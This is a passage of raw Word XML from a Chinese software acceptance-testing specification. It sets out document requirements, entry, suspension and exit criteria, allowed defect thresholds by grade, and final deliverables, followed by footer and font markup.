        <w:t>用户手册</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（提交方提供）：在</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>用户手册</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>中说明</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>产品安装、部署、功能使用、注意事项等</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>情况；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD28791" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="470" w:name="_Toc36488006"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缺陷</w:t>
      </w:r>
      <w:bookmarkEnd w:id="470"/>
    </w:p>
    <w:p w14:paraId="66A7985B"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要求开发方在合同双方约定的环境中对需要文档上提及的所有功能进行全面测试，且提交验收测试时，开发方发现的所有缺陷都已解决。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468CD8F0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="471" w:name="_Toc36488007"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="471"/>
    </w:p>
    <w:p w14:paraId="246B4F06"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验收测试环境准备完成，与线上真实环境一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C358DE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="472" w:name="_Toc36488008"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>沟通和联系</w:t>
      </w:r>
      <w:bookmarkEnd w:id="472"/>
    </w:p>
    <w:p w14:paraId="383525A0"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1. 提交验收测试的开发方负责人联系方式及测试工程师联系方式齐全 ；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F130F5"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2. 提交验收测试缺陷的沟通渠道建立完毕，要求快捷、准确、反馈及时 ；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F00BEE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="473" w:name="_Toc36488009"/>
      <w:bookmarkStart w:id="474" w:name="_Toc36573270"/>
      <w:bookmarkStart w:id="475" w:name="_Toc36630356"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="473"/>
      <w:bookmarkEnd w:id="474"/>
      <w:bookmarkEnd w:id="475"/>
    </w:p>
    <w:p w14:paraId="68069D00" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="476" w:name="_Toc36488010"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档验收</w:t>
      </w:r>
      <w:bookmarkEnd w:id="476"/>
    </w:p>
    <w:p w14:paraId="60C1E649"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lastRenderedPageBreak/>
        <w:t>进入标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AC5DD5"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文档准备必须齐全且符合标准，可以进入文档验收流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349869A7"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中断标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561A0B20"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1. 需求文档并非最终版，需求文档上描述的功能程序并未实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4029B433"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2. 测试用例与需求文档不匹配，测试用例中测试的模块在需求文档中不存在或者需求文档中的功能模块未在测试用例中体现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF2DFBF"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3. 测试报告书不完整，遗留缺陷不符合遗留缺陷允许限制的数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727E6658"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退出标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76293481"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文档符合标准并通过验收，进入程序验收流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D0207E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="477" w:name="_Toc36488011"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序功能验收</w:t>
      </w:r>
      <w:bookmarkEnd w:id="477"/>
    </w:p>
    <w:p w14:paraId="3C7B3D58"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进入标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED1BF4"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文档验收流程结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49564851"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中断标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E211BC1"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1. 出现 A，B级缺陷</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273263CD"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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C级缺陷达到</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B7B26"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3. 验收测试过程中，提交新的版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46204C2D"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退出标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60173F59"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验收测试合格，缺陷按照标准修复完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E633D6"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通过标准：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785F9844"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要求验收测试结束后，未解决的缺陷达到以下要求时，才能验收通过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06616EE7"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a) A级缺陷：0个；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E853AE"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lastRenderedPageBreak/>
        <w:t>b) B级缺陷：0个；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DF2A28"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c) C级缺陷：小于等于总缺陷数的3%；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D61023E"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d) D级缺陷：小于等于总缺陷数的5%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9FE9D3"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e) E级缺陷：小于等于总缺陷数的15%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA33AC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>注：对于放弃处理的提案，必须提前经过我方同意。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFD163E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="478" w:name="_Toc36488012"/>
      <w:bookmarkStart w:id="479" w:name="_Toc36573271"/>
      <w:bookmarkStart w:id="480" w:name="_Toc36630357"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收完成</w:t>
      </w:r>
      <w:bookmarkEnd w:id="478"/>
      <w:bookmarkEnd w:id="479"/>
      <w:bookmarkEnd w:id="480"/>
    </w:p>
    <w:p w14:paraId="7B4B0A4F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="481" w:name="_Toc36488013"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收完成后提交的文档</w:t>
      </w:r>
      <w:bookmarkEnd w:id="481"/>
    </w:p>
    <w:p w14:paraId="08D764F9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">a) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最终版需求</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A496A11" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b) 提交方提供的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最终版</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D76DE32" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c) 提交方提供的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最终版</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>测试报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54372411" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交方提供的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最终版</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户手册</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626F7C69" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="482" w:name="_Toc36488014"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验收完成后提交</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="482"/>
    </w:p>
    <w:p w14:paraId="6A04B8FC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验收完成锁定的程序最终版本。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:sectPr w:rsidR="00C55A9C" w:rsidRPr="003914A3">
      <w:headerReference w:type="default" r:id="rId126"/>
      <w:footerReference w:type="default" r:id="rId127"/>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19E26" w14:textId="77777777" w:rsidR="00751612" w:rsidRDefault="00751612">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3AB63CF0" w14:textId="77777777" w:rsidR="00751612" w:rsidRDefault="00751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ource Han Sans CN Medium">
    <w:altName w:val="Arial Unicode MS"/>
    <w:charset w:val="86"/>
    <w:family w:val="swiss"/>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文鼎PL细上海宋Uni">
    <w:altName w:val="Cambria"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>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venir Black">
    <w:altName w:val="Calibri"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009B" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Avenir Heavy Oblique">
    <w:altName w:val="Calibri"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000"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810083"/>
      <w:docPartObj>
        <w:docPartGallery w:val="AutoText"/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="4A486C7D" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
        <w:pPr>
          <w:pStyle w:val="a9"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A25348" w:rsidRPr="00A25348">
          <w:rPr>
            <w:noProof/>
            <w:lang w:val="zh-CN"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="5776CAA8" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661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D4AF3" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
    <w:pPr>
      <w:pStyle w:val="a9"/>
      <w:framePr w:w="347" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="10192" w:y="725"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rStyle w:val="afa"/>
        <w:rFonts w:ascii="Avenir Black" w:hAnsi="Avenir Black"/>
        <w:b/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="afa"/>
        <w:rFonts w:ascii="Avenir Black" w:hAnsi="Avenir Black"/>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="afa"/>
        <w:rFonts w:ascii="Avenir Black" w:hAnsi="Avenir Black"/>
        <w:b/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="afa"/>
        <w:rFonts w:ascii="Avenir Black" w:hAnsi="Avenir Black"/>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00A25348">
      <w:rPr>
        <w:rStyle w:val="afa"/>
        <w:rFonts w:ascii="Avenir Black" w:hAnsi="Avenir Black"/>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>19</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="afa"/>
        <w:rFonts w:ascii="Avenir Black" w:hAnsi="Avenir Black"/>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="1A61218C" w14:textId="6483773A" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
    <w:pPr>
      <w:pStyle w:val="ae"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="5103"/>
      </w:tabs>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2243F183" wp14:editId="2EEA5698">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>4393013</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>434975</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1185545" cy="333955"/>
              <wp:effectExtent l="0" t="0" r="14605" b="9525"/>
              <wp:wrapNone/>
              <wp:docPr id="119" name="Text Box 1"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr txBox="1"/>
                    <wps:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1185545" cy="333955"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="581755E9" w14:textId="42ABADA1" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
                          <w:pPr>
                            <w:rPr>
                              <w:rFonts w:ascii="Avenir Heavy Oblique" w:eastAsia="微软雅黑" w:hAnsi="Avenir Heavy Oblique"/>
                              <w:b/>
                              <w:i/>
                              <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
                              <w:sz w:val="22"/>
                              <w:szCs w:val="26"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
